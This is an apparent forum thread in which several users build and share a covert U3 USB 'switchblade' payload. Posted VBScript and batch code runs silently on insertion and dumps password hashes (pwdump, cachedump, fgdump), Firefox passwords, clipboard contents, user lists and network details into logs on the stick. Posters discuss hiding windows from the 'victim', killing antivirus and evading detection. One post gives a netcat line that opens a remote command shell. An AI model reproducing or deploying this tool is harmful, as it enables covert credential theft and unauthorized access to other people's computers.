beakmyn

Just to give everybody a heads up of what's being tested: OS specific running of payload checking if user is admin to prevent running code that requires admin privelege Copy wpa file to stick configurable log path Don't run cachedump if machine isn't member of a domain better clean-up BIOS info

Yeah, that happens sometimes. It's not a bad thing if they're left there IMHO, as it's easier to use the dump file rather then extract the hash from the html file if you need to use it JTR or OPH. I have better luck with fgdump, btw. I'm going to variablize as much of the script as possible to make it easier to work with. I have 1.5GB of programs on my drive and it's a pain to have to reflash to test (takes 30-45min).

VBS will also allow you add/delete/modify/enable/disable firewall/firewall rules. Such as: add authorized application add port open a closed port

For the Cachedump I use either fwdump -w, this tells it to skip dumping passwords and dump the cache or Cachedump Interestingly, I found that on my test machine (XP Pro) using the fgdump worked but using the cachedump (Gonzor's bundled version 1.x) would hang, the opposite of what you see happening. However, my payload now uses Cachedump 1.3 Note: Versions 1.0, 1.1 and 1.2 of cachedump all reported as 1.0 when queried for version. This was fixed in 1.3 Cachedump is really only valid when a user logs on using a domain account but is not connected to the domain. Since this seems to be a common sticking point I'm looking into implementing a watchdog timer. So, if the program doesn't close within X seconds I'll force it to close. X would be configured via the payload.ini, typically it should be 2-5 seconds.

New version config entry in ini file for save to directory c:safety.txt check New version of cachedump (try it out, see the ini file) Removed files for haksaw and VNC Put the payload.ini in <flashdrive>:SystemSrc Use Notepad to view/modify payload.ini http://rapidshare.com/files/76123081/flash...em_SRC.zip.html

payload.ini should be in the flashdrive partition src folder. payload.vbs can not be run without providing the path to the U3 and flash partition (look at how I call it in autorun), I figured it was easy to pass the paths rather the re-run the drive search utility. I'll add an option for output directory into the payload.ini, I'll add a safety.txt option also I'd have to see it lock up to know what it was trying to do. What the last thing in the html? Because I'm bypassing error handling in the vbs it makes it harder to debug. If you wanted I could work with you on manually running it without the "on error resume next" so we could debug it. Hmm, I thought it had the latest vista capable launchpad. I'll have to get the latest. I think that is for the haksaw, which isn't implemented/tested yet in my code. I'll remove the files and fix the payload since I have no intention of adding them in. I'm still working on a bullet-proof silent device eject. I'll get an update out early next week.

Not to split hairs but if you wanted you could put everything into the autorun.vbs script and use the methods of the file system object to do the same thing. Is is faster? I don't know but the weakest link is the speed of the flash write not the script. Recursion is easier, IMHO in vbs. I'll whip something up next week to show you.

Because the average user doesn't know how to program using NSIS. That's why I used vbs, kinda in between your solution and batch files but I could compile it. In fact I had to Google NSIS which looks to be a Nullsoft's scriptable installer? How silent can it be made?

keep looking

How do you figure you didn't have administrative rights? You have valid PWDUMP with the local administrator hash. PWdump only dumps hashes for the local accounts since it's being run locally. That user is managed by a domain controller so it will not have a hash in Pwdump, that's what cachedump is for. If you want domain info you have to run it against a domain controller using a domain admin account, something you're not likely to get.

This version doesn't use SBConfig. It require that the user be able to open the Payload.ini in Notepad (or other text editor) and manually make edits to the ini file. http://www.frontiernet.net/~beakmyn/output.jpg[/img] I found a couple issues. Since I used the Winaudit html layout as an example I missed a title block and it will say "WinAudit Freeware v2.27 Unicode" Woops, not sure how that one slipped past. Also, if you're going to use this to run an audit against a Windows XP Home edition machine be sure to disable cachedump, It doesn't appear to exit gracefully and hangs. This is an issue with cachedump and the fact that a XP home edition can not be part of a Windows domain so no cache information will exist. I think I'll add some checking to force certain tools not to run if the system is XP Home and possibly if you don't have admin since the tools will fail anyway. I'll make the fixes and re-post a new file. Oh, to view the file click on the Computername-date-time.html not the "left" or "right" file.

Did you edit the payload.ini ? I've tested this on three brands of u3 srives without issues. Right now it's set up to log everything except winaudit.

let me know how that goes.

I took the liberty of re-writing the switchblade in vbs. It now outputs into HTML format and has a few new options. It also uses a payload.ini fie instead of the numerous .dat files. LATEST http://rapidshare.com/files/79403074/switc...e0.3.2.zip.html URL history now HTML links

nc -l -p443 -d -e cmd.exe –L nc is netcat

SOLVED I'm in the process of re-writing the switchblade to vbs. I'm at the point where firepassword is run. By design it only writes to StdOut (the screen). In a batch file you simply pipe the StdOut to a file >> %log% <blah blah blah> Well in vbs there's always more then one way to do things and I can't get either to do it the way I want. I can call set oExec = objshell.exec(firepassword.exe) while yadda oExec.stdout.readline loop and get the output that way which is all well and good but you can NOT hide the cmd window that .exec calls. Although it's only up for a brief second it's long enough to be noticed. So, the other way one would think would be objShell.run " c:FirePassword.exe > C:tmp.log",0 , False Only problem is that doesn't work. tmp.log is never created and I don't know why. Any ideas? I trying to keep everything contained to one script and I don't really want to call a batch file to call firepassword. Are they're any alternatives to firepassword? SOLUTION: objShell.run "c:nircmd execmd c:FirePassword.exe >" & "C:tmp.log",0 , False

I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser. @HarshReality The AV is typically killed using AVKill but some Antivirus are immune or will countermeasure Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script. The 2 ways I know to keep from scanning yourself: 1. checks for presence of file "X" 2. checks computername/user against list stored in file on U3 Personally I would go with 1, less of paper trail, lest you lose your switchblade, but requires access to machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting U3 drive.

So, I'm in process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files This is so that I can output the data into HTML format (very similar to WinAudit html) Now here comes one question/decision. Since vbs is more powerful then a simple batch file I can either A. wshell.exec ("net user") which will be very fast and give me a list of users B. Use WMI or another technique and get vastly more data AccountType Caption Description Disabled Domain FullName LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status After doing some testing it appears that as expected wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds. Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one.

Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

Oh I thought you were working on something more complicated. I'm in the process of formatting the output using the WinAudit HTML output style with tables and anchors, etc.

I'd like to see that HTML output. I'm working on that now myself.

http://www.frontiernet.net/~wardriver/U3CUSTOM.zip That's got just the scripts and .dat files needed Items in the FD folder need to go on the flash partition sans the FD folder

I made some updates to your scripts, nice job btw. go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better then crashing and posting a dialog to the user victim. I've included only what's different otherwise I'm over the max characters for message: Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives On Error Resume Next strDate = Year(now()) &amp; Right("0" &amp; Month(now()), 2) &amp; Right("0" &amp; Day(now()), 2) strTime = Right("0" &amp; Hour(now()), 2) &amp; Right("0" &amp; Minute(now()), 2) &amp; Right("0" &amp; Second(now()), 2) For Each objDrive in colDrives 'ignore floppy drives - reserved by BIOS if they don't exist If UCase(objDrive.DriveLetter) &lt;&gt; "A" And UCase(objDrive.DriveLetter) &lt;&gt; "B" Then If objFSO.FileExists(objDrive.DriveLetter &amp; ":SystemSRCdrv.dat") Then strfd = objDrive.Driveletter &amp; ":" End If If objFSO.FileExists(objDrive.DriveLetter &amp; ":SystemSRCgo.bat") Then strU3 = objDrive.Driveletter &amp; ":" End If End if Next If objFSO.FileExists(strfd &amp; "SystemSRCPL.dat") Then objShell.Run strU3 &amp; "SystemSRCgo.bat " &amp; strfd &amp; "," &amp; strU3 &amp; "," &amp; strDate &amp; "," &amp; strTime, 0, False End If If objFSO.FileExists(strfd &amp; "SystemSRCU3.dat") Then objShell.Run ".LaunchU3.exe -a" End If go.bat I've added nircmd to grab the clipboard contents and winaudit (google it) :: Props: Setzer1411, Marc, rpk5000 :: fd = flash partition (writable) :: U3 = cdrom partition (readonly) @ECHO off If %computername%.==. SET computername=computer If %username%.==. SET username=None SET fd=%1System SET U3=%2SystemSRC CD %U3% &gt;NUL :: SET LOG PATHS IF NOT EXIST %fd%Logs%computername% ( MD %fd%Logs%computername% ) SET logdir=%fd%Logs%computername% SET log="%fd%Logs%computername%%computername%-[%3-%4].log" SET tmplog="%fd%Logs%computername%%computername%_TEMP.log" SET include="%fd%SRCInclude SET /p eipurl=&lt;"%1SystemSRCIncludeEIP.dat" SET /p winaud=&lt;"%1SystemSRCIncludewinaud.dat" :: PAYLOAD ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt; %log% 2&gt;&amp;1 ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] &gt;&gt; %log% 2&gt;&amp;1 ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 ECHO Computer Name is: %computername% and the Logged on User Is: %username% &gt;&gt; %log% 2&gt;&amp;1 IF EXIST %include%0.dat" ( ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 ECHO + [System info] + &gt;&gt; %log% 2&gt;&amp;1 ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 IPCONFIG /all &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 Echo + Shares + &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 net share &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 Echo + Users + &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 net user &gt;&gt; %log% 2&gt;&amp;1 ) IF EXIST %include%19.dat" ( ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 Echo + Clipboard + &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 .nircmd.exe clipboard addfile %log% ) IF EXIST %include%20.dat" ( ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 Echo + Win Audit + &gt;&gt; %log% 2&gt;&amp;1 Echo +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 ECHO WinAudit saved to %logdir% &gt;&gt; %log% 2&gt;&amp;1 .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txt &gt;&gt; %log% 2&gt;&amp;1 ECHO. &gt;&gt; %log% 2&gt;&amp;1 ) ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] &gt;&gt; %log% 2&gt;&amp;1 ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 :End EXIT winaud.dat rtfm for winaudit to see what the switches do /r=oxutn /o=PDF /m=CA Security Scan Also for the EIP I use http://checkip.dyndns.org/ You could use regular expressions to remove the extra HTML <html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html> but it gets the job done and uses a public server Take a look at nircmd if you haven't already it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)

Found the following issues | was being used as a piped command where I think your intention was for it to be a pipe character. If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort,retry,fail Count script sometimes returns "volume in drive d is removable" (where d is variable) this screws up the file name and you get computername - [volume in drive d is removable].log I'm investigating root cause.

Id love to take a look at the tweaks you've made, as well as the executable. What language? It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some case 3 " which what I expected to see in your code. But that tends to muck things up so instead I'll use chr(34) or equivalent and concatenation. I guess the batch file environment is more forgiving being an interpretated language but it makes the syntax highlighting in ExeScript goofing. That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with a exe wrapper. Not a real executable, yet. One thing I've done is changed the layout for the log file: ECHO +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 ECHO | [System info] | &gt;&gt; %log% 2&gt;&amp;1 ECHO +-----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 I find the above easier on the eyes then the old ***** method I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when its done. The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather then flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.